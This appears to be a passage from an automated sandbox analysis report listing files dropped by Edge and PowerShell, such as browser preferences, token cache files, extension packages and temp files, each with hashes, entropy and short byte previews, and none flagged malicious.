                                                                                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d15846a7-0b62-49b0-ab4f-0c249e0f8239.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):45290
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.088461721277529
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:0MkbJ6eg6KzhXRLrDK5UUXqgfb3HzgmymhJMJEwO3wG/CvokQYqGwLWZkHUfG67t:0Mk16zRRvDKhvgmNfP/aoqqfyW0e6x
                                                                                                                                                                                                                                                                                                                                                              MD5:AD684D0D24F463B6777CB8D110E341C7
                                                                                                                                                                                                                                                                                                                                                              SHA1:917F17BCCDC4D2F302C132AB9645B8D44A2F8895
                                                                                                                                                                                                                                                                                                                                                              SHA-256:71893CA28AC0E7DC1AD4503A1125F7EC94A1F1A1A702BCAC8FA7667B4B04E4B7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:D0F18283829FDA14BE36EF980AA7F61AE0D394680AE1A0AF5A14644032B071A99CECDADA13BE0A6DC35F12A7ADA2A4D56C7BDC8681277E84B18342A3627015D1
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1739863008"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Tokenuserer\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2278
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8386698267112744
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:uiTrlKxrgxLJxl9Il8uPIAjhlOlCSRkmU/Bq7nU9dB1u/d1rc:mIY2kh8UmKBd9j1j
                                                                                                                                                                                                                                                                                                                                                              MD5:3517187C18DA92B220801AEC545A1F98
                                                                                                                                                                                                                                                                                                                                                              SHA1:36DEACA49A4461F5332E6FC65608932C56D477A6
                                                                                                                                                                                                                                                                                                                                                              SHA-256:C697FB4691ACB5607123219B19DB2CAB8BDD97002DDDBA0016D34B259184CF70
                                                                                                                                                                                                                                                                                                                                                              SHA-512:EE473EC8524A6C3A5AE14D9E8109778828D623852DAC2A80114641F0253DEAC3672B81B5779610457949DF607B716FCE84C749511755AE8D00A6CD7AB718D955
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.E.W.z.d.d.2.B.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.Y.u.o.p.r.Z.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Tokenuserer\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4622
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.997808946716273
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:qYX6CtVCMUZ77JZPsGp1LfraAOwPRddyrRmvqV:qctVO5nPZb/EwZvqV
                                                                                                                                                                                                                                                                                                                                                              MD5:3BD2CCBB643BCA7BFB6065AFF74EEE69
                                                                                                                                                                                                                                                                                                                                                              SHA1:995EE54B097CD60DBB2CA855E2F54141AE55B1BE
                                                                                                                                                                                                                                                                                                                                                              SHA-256:5413E0D7CB311D4A93CA03D176E4CB4649053BB69911ABFD30B7FBC9094EE13E
                                                                                                                                                                                                                                                                                                                                                              SHA-512:3BC2221366BE0670EA8C016DA087F301C705F0EB1DC9054650A246E7BD014E1B8D856F95262663A7C1B5AB559A767AD4F6B1FB9CB57B6CD94F198D045714850E
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".+.P.x.S.W.t.W.B.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.Y.u.o.p.r.Z.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Tokenuserer\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2684
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8923009449314705
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:uiTrlKx68Wa7xXxl9Il8uPi0+x19Kqlo02GAuwR7LxdBd/vc:a5Yo0+xnKqBwR5dQ
                                                                                                                                                                                                                                                                                                                                                              MD5:6DB395892848F1CD201715303ADA109A
                                                                                                                                                                                                                                                                                                                                                              SHA1:F052103AFD5FD540CC423AA0B1F588E6FFDD169C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:8F4A6943D598AE606AFB10110C1EE0C99D171FF19905CECF795E95891F024B60
                                                                                                                                                                                                                                                                                                                                                              SHA-512:4F24086596861635BD235DCEB0DB6926C2CBC0F4AACEE2853B645509CD2969232270CC3F198E676081DCA6A20E7F6D1E7C9161DA475D9F780697614C30C538AD
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".7.Y.y.m.i.a.a.g.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.Y.u.o.p.r.Z.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:@...e...........................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\07b78d21-445b-4e56-9434-90802f5e66f2.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):154255
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.844315193710191
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:IH0Gn9mK7OlWbWd/4yjbZH/FZnUO5wYrfzeIX74kwjFMziwmNfxL15tUyH:IUG9mKqlzgyjbZH/jUyLXUkwjF971FUi
                                                                                                                                                                                                                                                                                                                                                              MD5:240CD355E89EC1F3566BB2EF1F361DAD
                                                                                                                                                                                                                                                                                                                                                              SHA1:2ADE60EB20F0FB16657A4FB024D207A931DC927F
                                                                                                                                                                                                                                                                                                                                                              SHA-256:1F0388D23A4D8492E2F9839392B22A6957DEAE8750B60FF860EE939811594295
                                                                                                                                                                                                                                                                                                                                                              SHA-512:961FE2017949D185761D8491AB4F7F2EC3B0562CFB6FEF202C34D685A87F2EA032F53D653E4C1D492DFF1FB43D738E7727985738C1A956A1A18AAE77A3D7F3B6
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[..........gE5.*B1_+.)l\....n.sj.n.-.su....kM.`..w..k..u.L..G_9a ..=H..Ag.i.a. .&f!t....s. ............Fy.Cu..a9.C........f7...CW.e._.Zy.W.t.`z.B....k....|$......G.PI/x]_...L.j..<at...%w.....K,y......s&.....%.4)p...........-2)/....P.....H.;m...}.CP..$E....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E. $.I....D....h.n.8......y.|.{5.!.!..@.9.E.o..x...=..}..<.......W".%............mo.:......|F....|{H0..S._....0-.ChC..h.....:.....R%Z....u/.....Y_...8./....>.).....OogU.......P.W.a...._..c,..RH}.......m#3..2.U=.O...~....2.H.O...F..Y.j..2....o.......*.......6..?.........{........|.^....1s..H..#.'.O..Q_....+."

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\0aed585b-d95d-4923-8453-6474941766fd.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\3e2c2b9f-e025-4057-8a8c-b3f5a5c4e0e6.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 747x869, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5438535
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.99771807720039
                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:98304:hg6gc8v4xqdezdw7Y2PfWiFnjD+NZVGyAmOfpY/kQFdIzjDpgoJpO5amz:hgTR2qdezqY2LDQZVcmBkQnQZjmz
                                                                                                                                                                                                                                                                                                                                                              MD5:C5FA92DEC4B129C49634014B3D56D5E7
                                                                                                                                                                                                                                                                                                                                                              SHA1:59BBBC18101D7D8A76C7F26996A779345D2D72E3
                                                                                                                                                                                                                                                                                                                                                              SHA-256:B8AE06CAC8F34EB9A657CC0AA6594E6A29ED728ED51955C7A96D152C347514C7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:8C0A06E614BFD0A4F5A662EF80C011BBDD5EF3AEEB0D10F086937E573915285BE54A87D63A3F99366254CD07F33023540096A875383516542F627A679E3002AD
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8 ........*..e.>.F.J...!......in.l.P..g^?........U...o.?..a.+.....OW...G...........o......x..zO...?....3......`...../.G.......1.........~{..........A...A..........{~....w.?....*.......v....}h.g.........................o...?..........O.......s.......o.......;.+.../.?..............7................O...................m...'............+.......o...............?.....?......}.#.........M(w(@i..ak.`.}.o...J...,!>.x#.....x]Y.r..g.N.dl.......Tcdz..S..<l}.v...w$xe..4...61.?...&.@.....G.I....<z......l<.....ZR..R...tlB..m.F.Y.PZ.D......./....h..dl...;@...ct.p....r.?.[_.:%.% @...b..`...P..H..0..0..0..0..0..0..0.v. ../X.u.. ..~^.......;:.z..bg3.j6.j@..........Q..x.....:.!....q...D[.....E"%..\6...Z.l.u{;_R..z..f.e.`T.G...+..w...E.,I.:.Q.8...Q..x.*>..+h..OQ.OKc2.x...L ;..E.P3..0c.....e.....K...7..P..1(o..*......:u+.y.4...M..J...m.,.8#..|.*o0;.....Q.A..%Y....J...Rb....,..\K...[..=.;.`_.Y...S.w....2...B-[|.9...^'X..4.No...Y.Yg.b.u....N..H.~q..vk..|.....

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\68e9f24d-ba01-4f73-af57-ff142436750a.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 20243
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):6662
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.965006314912417
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:lOvu9KpU//AmJubwRrcIHYY7gyu2aEnsC9MgMG8EY:lOvu9Ky3d41Se2aEsCqgMG8L
                                                                                                                                                                                                                                                                                                                                                              MD5:5D395A17B62558727A7EA4F644F4368E
                                                                                                                                                                                                                                                                                                                                                              SHA1:489D937B1FDB9BD2F9D50D1FA29707563BE1C87E
                                                                                                                                                                                                                                                                                                                                                              SHA-256:19BE14522EB6B7793C8EA6E3F4CB31DCDD74B9C2E52BA2FD4CF98146238E3C7C
                                                                                                                                                                                                                                                                                                                                                              SHA-512:24192E0E3EB2B7985AFF315B6EF0DF94BC502477F3FEE44017E2F5B138FB05F1A3C6FA81FC6F5299A424212D194EEDBBDD2D6E4CF19E5FE9862ACF1060F12882
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:...........\.S...+Du....x..".$$!......F.l.lK+.....ow.H...!..s...h.===._..X..g^..3.x.e....w.l...=c....al..f.Z.F..ll...&..a-.Y.k..M.X.....g^8...p..3...l`......U...?.O..N..1..=>......]7.5.q1.ok..bi.....\[c.....}.....q.FI...(...+o..Y..a...b..e<.~:.g+.}....m[.+h..>.^8K.....\...2L-...A..R.].u.o.Hu.f....R.c..$..0..............k_....j...o...n.LP...9.c.+..7...k.4K..._..xq....dN.gkk..#}s.n.(.$.l$...~.q....t..i...I.+K).bp..0.7f...tgb.2)#?.t$...l..M.....%p`u..Q*..w....!...".68.....P[..c...H<r..x.A.0...Am...R.=....F...........x1s.$.......E.:.y.J.a<...8....R..[.k..Q0...9a..E.<...$...".y./+.kZ..`-X.....Y...`.a...}.s...#...V-.S.X....H...,,..,..,...XN.b9...,....V..V.-V....d}..,....{0.uI../*.l..Wa.P.u.J.'."L...j.jt...9.ys...~.-l{..Q...f....+...:......~.3...rZ...Q..t.9G..Y.4....|...E6..T.p].R.jT.&.0...e.C. ...0.U....o`Gn.7...2.K.fc..?.............d....8..F...lq.&..y7...m.....8jf.*]?.\%..!..yl.<8..Z..a5s6.L.v.*H6.KM.!...D.Y.m..|.Y.g..3.Z..9_..0i.L..>

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\7105245d-c10a-4c67-a804-a57c450989f3.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):11185
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                                                              MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                                                              SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                                                              SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                                                              SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\74eb1094-8f69-4ba5-ad85-91275b16cd54.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):76326
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9961120748813075
                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
